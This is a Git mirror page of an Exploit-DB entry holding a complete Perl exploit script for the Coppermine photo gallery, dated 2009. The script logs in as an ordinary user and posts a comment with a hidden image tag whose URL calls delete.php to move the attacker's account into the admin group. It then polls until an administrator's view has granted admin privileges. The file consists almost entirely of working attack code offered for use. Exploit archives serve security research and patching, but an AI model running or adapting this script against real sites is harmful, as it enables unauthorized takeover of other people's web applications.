bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/8115.pl
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

121 lines
3 KiB
Perl
Executable file
Raw Blame History

#!/usr/bin/perl
#inphex - inphex0 at gmail dot com
#based on http://milw0rm.com/exploits/8114 - found by StAkeR
#In case this does not work check out pos(Line 80) and find another value for it
use IO::Socket;
use LWP::UserAgent;
use LWP::Simple;
use HTTP::Cookies;
$_1 = shift; #[HOST]
$h = ($_1 eq ""?($n = 0):($n = 1));
$_2 = shift; #[PATH]
$_3 = shift; #[ID]
$_4 = shift; #[ALBUMNUM]
$_5 = shift; #[USER]
$_6 = shift; #[PASS]
$d_p = 80;
if (!$_1 || !$_2 ||!$_3 ||!$_4 ||!$_5 ||!$_6) {
print "perl coppermine host /path/ youruserid albumnum yourusername yourpassword\n";
print "perl coppermine host.com /path/ 3 2 inphex 123456";
exit;
}
if ($h) {
$socket = IO::Socket::INET->new(Proto => "tcp",PeerAddr => $_1, PeerPort => $d_p) or die("[-]ERROR");
print $socket "GET $_2 HTTP/1.1\n";
print $socket "Host: $_1\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
while ($answer = <$socket>) {
$f_answer = $f_answer.$answer;
}
$url = &gen_url($_1,$_2,$_3);
if ($url) {
$code = &gen_code($url);
$res = &_send($_1,$_2,$_3,$_4,$code,$_5,$_6);
}
}
sub gen_url($$$) {
$h = shift;
$p = shift;
$i = shift;
$url = "http://".$_1.$_2."delete.php?id=u".$i."&u".$i."=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no";
return $url;
}
sub gen_code($) {
$url = shift;
$code = "yoyoyo[img]".$url."[/img]";
return $code;
}
sub _send($$$$$$$) {
$h = "http://".shift;
$p = shift;
$i = shift;
$aid = shift;
$co = shift;
$u = shift;
$pass = shift;
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->cookie_jar( $cookie_jar );
$login = $xpl->post($h.$p.'login.php?referer=index.php',
Content => [
"username" => $u,
"password" => $pass,
"submitted" => "Login",
],);
if($cookie_jar->as_string) {
$c = 1;
print "[+]Connected\n";
print "[+]Logged in\n";
}else {
$c = 0;
}
if ($c) {
$con = get("".$h.$p."displayimage.php?album=".$aid."&pos=0"); #pos may be changed
if ($con =~m/addfav\.php\?pid=(.*?)\&amp/) {
$p_id = $1;
}
}
$se = $xpl->post($h.$p.'db_input.php',Content_Type => 'form-data',
Content => [
'msg_author' => $u,
'msg_body' => $co,
'event' => 'comment',
'pid' => $p_id,
'submit' => "OK",
],);
print "[+]Comment sent\n";
print "[/]Waiting for admin to view\n";
$| = 0;
while (1) {
sleep(20);
syswrite STDOUT,"-";
$xpl1 = LWP::UserAgent->new() or die;
$cookie_jar1 = HTTP::Cookies->new();
$xpl1->cookie_jar( $cookie_jar1 );
$_con = get("".$h.$p."logout.php?referer=index.php");
$login = $xpl1->post($h.$p.'login.php?referer=index.php',
Content => [
"username" => $u,
"password" => $pass,
"submitted" => "Login",
],);
$const = $xpl1->get($h.$p."index.php");
if ($const->as_string =~m/Config/) {
print "\n[+]You just gained Admin Privileges";
exit;
}
}
}
# milw0rm.com [2009-02-26]
Reference in a new issue View git blame Copy permalink